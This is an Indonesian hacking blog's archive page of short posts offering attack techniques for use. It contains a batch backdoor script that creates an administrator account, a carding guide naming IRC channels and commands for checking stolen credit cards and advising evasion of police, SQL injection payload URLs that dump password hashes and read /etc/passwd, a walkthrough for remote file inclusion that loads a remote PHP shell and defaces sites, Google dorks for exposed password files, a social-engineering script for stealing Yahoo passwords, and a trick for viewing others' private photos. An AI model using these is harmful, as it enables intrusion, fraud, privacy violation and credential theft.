Web Hosting


Indosat Blog Contest (SinyalKuat.co.cc)
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Lacak Penjiplakan Postingmu

Walah....
Ini anhe bin lucu....
Hehhehe....
Pernah ga postingan loe mrasa dijiplak ????
Hhahaha.....
Nah ini dia nhe Detektifnya...



Nahloh....Dicoba aja dech
Kamu ketahuan.....Huakakak
hehehe


Readmore...

Posted in Label: | 2 komentar

Tembus Anti Exe

gw mo coba share tentang cara mengalahkan warnet yang dipasang anti exe, tapi gw cerita dulu ya:

IP warnet gw di blok oleh salah satu game online karena ketauan banyak yang make cheat RF, so gw protek warnet gw dengan anti-exe dengan nama software: antiexecutable, kaya nya nh software satu perusahaan dengan deepfreez.. udah keinstal dan gw coba copy n install berbau .exe ga mau dia..
tapi setelah rasa penasaran cara ngakalin, ga perlu waktu lama untuk nembus nya, pake logika dikit, yang ga bisa dicopy kan .exe

nh cara nya:

1. ganti .exe nya, misal setup.exe ganti menjadi setup.bin
2. copy aj yang ada program di kompi warnet misal ada yang nama nya klite.exe , nah copy setup.bin ke folder yang ada klite.exe
3. delete klite.exe,
4. truz ganti nama setup.bin menjadi klite.exe
5. yupz selesai..

ini hanya untuk keperluan yang bermanfaat, bukan untuk merusak,

ex: yang ingin menjalankan idm, yang warnet di proteksi dengan anti-exe,
or yang mempunya program untuk tugas aj


Readmore...

Posted in Label: | 1 komentar

Ngembat gambar yang di proteksi oleh spacer

Di beberapa website yang ada di zaman sekarang ini,banyak sekali yang menggunakan protection agar gambarnya tidak dapat diambil,ya sangat mengesalkan juga jika gambar yang kita sukai tidak dapat di save,ketika kita save hanyalah sebuah spacer image atau image kosong. Ini bukan lah program yang begitu sulit dipecahkan,ini hanyalah sebuat bahasa pemprograman website. Cara kerja spacer ini adalah menumpuk diatas image yang sebenarnya.
langsung aja juragan di sedottt ampe keluar...
buat para master tinggal senyum
buat nubie,semoga bs jd pembelajaran
http://h1.ripway.com/kingsaint/tutolieur/flickr.exe


Readmore...

Posted in Label: | 0 komentar

Grab(download) video dari youtube dengan source code!!!

Daripada kita harus repot pake software, mending pake source code aja

caRa ini Lebih terLihat pRofesionaL,jadi kLo buat beGaya di warnet,ini emang cocok buaT Loe,he,he,
waH udah terlalu panjang niH tuLisannya kayak kereta aPi tut,tut,tut, siapa hendak turun, ke Bandung, Surabaya, beLi karCis jangan nguTang,he,he, cuKup!!!! to tHe poiNt. caRa nya adalah gini. O iya saya menggunakan Browser Opera supaya lebih muDah, dengan bRowser Lainnya tetep bisa cuma ada sdikit banget perbedaan!!!! Okeh Nomor saTu adalah :


Buka situs YouTube.com, caRi viDeo yg anda mau simpen di PC , misalnya:



LaLu tampiLkan Source Code nya dengan cara kLik view -> Source, Like this:


setelah munCuL PageSource nya, cari tuLisan Fullscreen dengan cara kLik Edit -> Find, atau dengan menekan tomboL CTRL + F. Lalu ketik tulisan "Fullscreen" dan tekan Enter. hingga anda teMukan tuLisan "Fullscreen" tersebut, seperti:



di sekeliling tuLisan Fullscreen tersebut ada kode² (pokoknya bukan kode buntut,he,he,) seperti ini misalnya (tergantung Videonya):

watch_fullscreen?fs=1&q=rivers%2520crew%2520trailer%25202008&vq=None&sourceid=
ys&video_id=LxvABm3qmYc&l=328&sk=CA538a1adta3faR390RPDmPTXKES2tZRC&fmt_map=6%2F720000%2F7%2F0%2F0&t=
OEgsToPDskKMsTNQXR8qX8QVdtlxCa-n&hl=en&plid=AARMR_793Y-BcyJwAAAAoAAYAAA&title=Rivers Crew Trailer 2008';



Lalu bLok kode tersebut setelah tulisan watch_fullscreen (dari tanda tanya) hingga sebelum tulisan &title Lalu klik kaNan & pilih Copy.

PerHatikan ini!!! Kopi hanya yg berwarna merah saja :

watch_fullscreen?fs=1&q=rivers%2520crew%2520trailer%25202008&vq=None&sourceid=
ys&video_id=LxvABm3qmYc&l=328&sk=CA538a1adta3faR390RPDmPTXKES2tZRC&fmt_map=6%2F720000%2F7%2F0%2F0&t=
OEgsToPDskKMsTNQXR8qX8QVdtlxCa-n&hl=en&plid=AARMR_793Y-BcyJwAAAAoAAYAAA
&title=Rivers Crew Trailer 2008';





Lalu, buka kembaLi jendeLa Video Youtube yg sedang dimainkan. Lalu ubah address bar atau URL tersebut,
dari http://www.youtube.com/watch?v=LxvABm3qmYc
menjadi http://www.youtube.com/get_video
setelah itu kLik kanan pada akhir URL dan pilih Paste & Go. Like this :



Maka akan muncuL kotak Download File dan piLih Save. seperti ini :



Lalu pada kotak Save As, ubaH File Name nya menjadi "NamaVideoNya.FLV" (tanpa tanda kutip,, ingat, ingat, jangan Lupa menambahkan .FLV pada akhir Nama file. & Pada bagian Save As Type, pilih ALL Files atau yg bertuLiskan *.* Lalu kLik Save.
Lihat ini :



seteLah itu akan terbuka jendeLa transfer/download, tunggu proses itu dengan sabar, kaLo udah selesai kayak giNi neh :


Nah Video tadi siaP di gunakan sebagaimana mestinya...


Readmore...

Posted in Label: | 0 komentar

Hack Private Photo Friendster

Pada penasarn kan kalo temen ato pacar anda kok masang private photo di friendster. Kalo begitu anda senasib dengan saya. Setelah iseng iseng nyari sesuatu di google, lah kok nongol artikel tentang hack private photo friendster. Awalnya sih ak pikir ini trik yang jadul itu. Tapi setelah diperhatikan lagi lho kok bulan september tahun 2008>

Siap beraksi deh..awalnya dapat artikel yang cara bukanya pake program. Apalagi untuk buka programnya harus download file sebesar 20 MB, yah terpaksa deh go to warnet..Masak download 20 MB pake internet gratisannya Fren yang tiap 30 detik putus..mungkin sampe lebaran baru selsai downloadna. Sip abis download tu program balik lagi ke rumah. Pas di coba la kok gak jalan, mungkin gara2 internet putus sambung ala fren yang aku pake. Tapi ak blm nyerah..nyari lagi di google tentang cara menggunakan tu program..eeh malah nongol cara yang lebih gampang.Ya udah ak kasi triknya:
1. Pikirin target yang akan jd korban
2. NAh kalo dah ketemu..buka FS kamu.
3. Masuk ke FS nya korban.
4. Nah liat di adress bar..alamat URL si korban ex:http://profiles.friendster.com/14734479
5. copy deret nomor terakhir di urlnya kayak di atas tu jadinya 14734479
6. Sekarang buka situs http://www.manismadu.com/kampret/.
7. Tinggal masukin nomor yang didapat tadi, contoh tadi 14734479.
8. Nah setelah enter akan muncul gambar 2 album, nah untuk private photo ditandai dengan gambar gembok. Klik aja.
9. Der..gambarnya muncul..!!!.

kalo link di atas ga bisa coba yang ini..tapi gak disarankan bagi yg lagi puasa ada godaan godaan di bagian atas :
http://www.rasa-rasa.com/mambot/fs.php
http://www.rasa-rasa.com/mambot/friendster.php

Readmore...

Posted in Label: | 0 komentar

Hack Password Yahoo Dengan Chatting Menggunakan Yahoo Messenger

ni namanya Teknik sosial engineering..
Caranya :
1. Chating sama temen kamu pake YM
2. Ngobrol panjang lebar, sampe keliatan akrab..
3. Nah kalo sudah dirasa akrab, siap beraksi.

Ini namanya Teknik sosial engineering..
Caranya :
1. Chating sama temen kamu pake YM
2. Ngobrol panjang lebar, sampe keliatan akrab..
3. Nah kalo sudah dirasa akrab, siap beraksi.
4. Haker: hey kamu tau gak yahoo punya fitur rahasia baru lo..
Korban : Kasi tau dunk...
Haker : Sekarang kamu liat ya tulisan apa yg aku kirim..
Kamu ketik aja dengan karakter *******.
Haker : Udah liat tulisanku blm?
Korban : lho kok isinya cuma *******.
Haker : Nah itu rahasia terbarunya yahoo.. Yang tadi aku tulis itu password emailku.
Korban : masak sih ..aku coba ya.
Trs dia kirimin passwordnya buat kamu . Kena deh...

Readmore...

Posted in Label: | 0 komentar

Echo Backdoor

rem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal


rem *MULAI.

@echo off
PROMPT $P$G
cls
Color 87
GOto iklan

:setting

rem *ganti USER dan PASS

set USER="backdoor"
set PASS="password"

if %USER%=="backdoor" Goto gagal else GOto proses

:proses

rem *masuk ke perintah tuk nambahin user + passwordnya

net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete

cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70


EXIT

:iklan

rem * just a banner from me :) , bisa di hilangkan :p

echo.
echo ###############################################################
echo # #
echo # Echobackd00r #
echo # created && tested by y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI #
echo # note: ubah USER dan PASS #
echo # #
echo ###############################################################
echo.
echo tekan ENTER !!!
pause>nul

Goto setting

:gagal

echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.

Readmore...

Posted in Label: | 0 komentar

Senjata Seorang Carder

Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.

Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.

Mari kita mulai......

1.masuk ke MIRC
dari MIRC kalian join ke channel ini :

#CCPOSTS
#THACC (Dulu namanya #thecc)

sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!

2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.

3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.

4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)

5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.

6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.

ini nih cuplikannya :

#ccposts

*** Now talking in #ccposts

*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'

*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands

*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , <> is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?

*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)

*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )

* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802


#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade


Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak

Readmore...

Posted in Label: | 0 komentar

Google Hacking

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.


--- 01 // Penggunaan Dasar -----------------------------------------------

- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda
bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan

- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
"linus tanpa linux", kita bisa menggunakan "linus -linux"

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll
Google akan menghasilkan pencarian hanya yang mengandung kata
"menja".

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: "menjadi * hacker"
Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",
"menjadi white hacker", dll.

- "": Dapat digunakan untuk mencari kata yg lengkap.
Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3



--- 02 // Operator Spesial -----------------------------------------------

-- Contoh hasil pencarian --

Google --> Judul
... Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 --> URL

-- Contoh hasil pencarian --


- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan
deskripsi "Administrasi"

- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata "Admin" dan "Administrasi"

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dan "Administrasi"

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"

- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: "hacker" filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com


--- 03 // Manipulasi URL Google ------------------------------------------

> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aecho.or.id&btnG=Search

> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aecho.or.id&btnG=Search

> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL :D
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aecho.or.id&btnG=Search

> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aecho.or.id&btnG=Search

> safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri :D
Karena bandwidth di Indonesia mahal ........

Contoh script google.html lengkap dengan varabielnya.

--- BOF google.html ---


Variabel num:

Variabel hl:

Variabel lr:

Variabel as_qdr:

Variabel safe:






--- EOF google.html ---


Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda :D
Berikut merupakan script default pencarian google.

--- BOF google.html ---







--- EOF google.html ---

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com


--- 04 // Tips & Tricks --------------------------------------------------

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan
semua site echo.or.id yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size

inurl:"admin.mdb" -html
inurl:"password.mdb" -html
inurl:"data.mdb" -html
"phpMyAdmin" "running on" inurl:"main.php"
intitle:"PHP Shell" "Enable stderr" php

Masih banyak lagi keyword yang bisa ditemukan disini [5] :D


--- 05 // Referensi ------------------------------------------------------

[1] http://www.google.com/help/basics.html
[2] http://www.google.com/help/features.html
[3] http://www.google.com/help/refinesearch.html
[4] http://www.google.com/help/interpret.html
[5] http://johnny.ihackstuff.com/
[6] O'Reilly - Google Hacks

Readmore...

Posted in Label: | 0 komentar

Membuat Php ProxY

Artikel penggunaan proxy dimaksudkan untuk melewati beberapa situs yang diblok, intinya untuk jumping dari ip asli kita ke ip lain. Tehnik yang dilakukan bermacam-macam untuk melewati blokir Ip dari membuat proxy sendiri lewat shell target, memakai software proxy hingga memakai proxy yang berbayar, penulis akan mencoba memakai tehnik suntik dari shell target lewat script php proxy, btw semua untuk pembelajaran semata jangan disalah artikan.
Untuk memakai script ini ga susah hanya harus dapat shell target and upload scipt itu.

Langsung aja, penulis asumsikan anda susah dapat target, masuk ke target anda

extract file phpproxy.zip di commands shell dengan perintah unzip phpproxy.zip

kemudian arahkan URL yang terdapat file yang tadi anda upload script phpproxy


Sudah berhasil kita upload script phpproxy, kemudian cek Browser kita tanpa phpproxy

Arahkan Browser anda di URL proxy yang kita buat

Selamat Mencoba

Readmore...

Posted in Label: | 0 komentar

Php Injection In Action

== WEB HACKING IN ACTION PART I==-
PHP - MYSQL : SQL INJECTION
—————————-
(Dumping MySQL Database)

CREATE TABLE `userlist` (
`id` tinyint(6) NOT NULL auto_increment,
`username` varchar(28) NOT NULL,
`status` varchar(28) NOT NULL,
`password` varchar(48) NOT NULL,
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
`nama_lengkap` varchar(128) NOT NULL,
`status_id` tinyint(6) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;


– Dumping data for table `userlist`

INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES
(1, ‘anxx’, ‘administrator’, ‘8a1465884c097cfa30e332c57exxxxxx’, ‘2007-05-15 21:18:08′, ‘anxxx nightlogin’, 1),
(2, ‘kaxxxx’, ‘operator’, ‘8a1465884c097cfa30e332c57xxxxxx’, ‘2007-05-04 21:18:31′, ‘kaxxxx poseidon’, 2),
(3, ‘bxxx’, ‘operator’, ‘b3f85374ebbdb228c0ad76cd6axxxxxx’, ‘2007-05-04 16:51:32′, ‘Bxxx Erlangga’, 2),
(4, ‘haxxx’, ‘operator’, ‘daa526517139536f056efbb8exxxxxx’, ‘2007-05-04 20:13:31′, ‘Haxxx pekok’, 2);

#############
# SEKENARIO 1
#############

nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;

?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ and ‘a’='a
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1′%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1′%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwdx.txt’/*

#############
# SEKENARIO 2
#############

nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwd.txt’

#############
# SEKENARIO 3
#############

nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;

?>

Eksploitasi:

http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1′)%20and%201=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′) union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1′)%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′)%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’/*

Readmore...

Posted in Label: | 0 komentar

Sql Injection Ver. 5

Readmore...

Posted in Label: | 0 komentar

Sembunyikan File

Perintah ini memeng unik, dan mudah, gue aja baru tau.

Ok langsung aja, kita ambil contoh file gambar.jpg dengan dataku.zip di dalam folder data

buka command prompt, ketik perintah

C:\data>copy /b gambar.jpg + dataku.zip dodol.jpg
gambar.jpg
dataku.zip
1 file(s) copied.

Kita lihat lagi di dalam folder, ada penambahan file dodol.jpg dengan tampilan sama dengan gambar.jpg, tetapi berbeda besar filenya.

File yang pertama adalah file yang akan di masukan file yang lain

Sedangkan File Yang kedua adalah file yang akan dimasukan

File yang di masukan dan file yang akan dimasukan tidak harus file gambar atau jpg dan zip, tetapi bebas apa saja, yang penting dia FIle bukannya ember atau baskom.

Oh iya… kalo mau buka file yang di sisipkan atau di masukan menggunakan program aslinya

Contoh yang dimasukan file zip buka dengan software zip.

selamat mencoba ….

Readmore...

Posted in Label: | 0 komentar

Google Attacker

Readmore...

Posted in Label: | 0 komentar

Yahoo Boot

Readmore...

Posted in Label: | 0 komentar

Membuat Proxy di dalam shell

Readmore...

Posted in Label: | 3 komentar

cara menggunakan exploit di site http://milw0rm.com

1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana…hehe maklum itu forum saya!!!
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi

Readmore...

Posted in Label: | 0 komentar